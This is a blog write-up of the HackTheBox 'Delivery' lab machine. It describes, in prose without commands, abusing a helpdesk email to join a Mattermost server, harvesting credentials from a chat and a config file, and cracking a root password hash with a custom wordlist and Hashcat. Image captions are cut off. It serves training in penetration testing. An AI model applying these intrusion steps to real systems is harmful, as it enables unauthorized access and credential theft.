Delivery is a Easy ‘Real World’ style box from HTB and created by IPPSEC. It showcases problems in Help-desk systems and password reuse. I begin every scan using RustScan; once it completes it runs NMAP filters and exports to
HTML for easy reading:
After finishing the scans I noticed
Port 80 was open. Visiting the website I see a homepage for DELIVERY and a contact us button.
Contact Us page showing a lot of useful information (hints).
I can see a few key pieces of information on the Contact Page. A link to the HelpDesk, the fact that having a @delivery.htb address provides escalation and a link to the MatterMost server. I click each link and add them to my hosts file.
I visit MatterMost first and try to register unsuccessfully. Next, I navigate over to the Support Desk and open a new ticket. I first thought of trying to upload a PHP web-shell or doing some cross-site scripting. There was also a CSRF (Cross Site Request Forgery) token in place which stunted a lot of progress. During this time I also had a few FeroxBusters running in the background doing Directory searches on the primary website and the MatterMost server link. I feel its important to highlight these items/mindset as it is not regularly mentioned.
After coming up short with everything mentioned above I finished filling out the ticket. Should have realized this was an IPPSEC box and not the normal ‘Easy’ boxes I had becoming accustom to on HTB. After filling out the ticket I was presented with an automated message which tied the TicketID to @delivery.htb address.
I went back to MatterMost, filled out the registration form with the same ID and viewed the ticket:
Confirmation of my MatterMost registration.
I logged into MatterMost and read through the thread. First I noticed some credentials for the maildeliverer account. I also noted the password reuse comment with the IPPSEC typical PleaseSubscribe!. As someone who has watched every video IPPSEC has on his channel this was a huge hint.
Viewing the thread shows a few more key pieces of information AND the
After logging in with the maildeliverer account I immediately went searching for the MatterMost configuration. This is due to most web applications have a configuration file/database, the fact that the Root account was a user on the board AND reading the MatterMost documentation during my discovery.
MatterMost configuration provides database credentials.
The configuration file provided my Database credentials. I logged in to the database and loaded the Users table. Inside I found a password hash:
Password hash for the
I used THIS link alongside a program called Mentalist to build a password list for Hashcat. I used the baseline password of PleaseSubscribe! as noted in the support post and added the years 2019-2021 variants alongside the seasons. I was going to go wider and use a ruleset however thankfully I got a hit.
Mentalist password list being built.
Hashcat running the password list.
I used the cracked password to login to
root and claimed the flag. Thanks IPPSEC for the awesome box.
The root flag for the Delivery box hosted by HTB and created by IPPSEC.
Leave A Comment
You must be logged in to post a comment.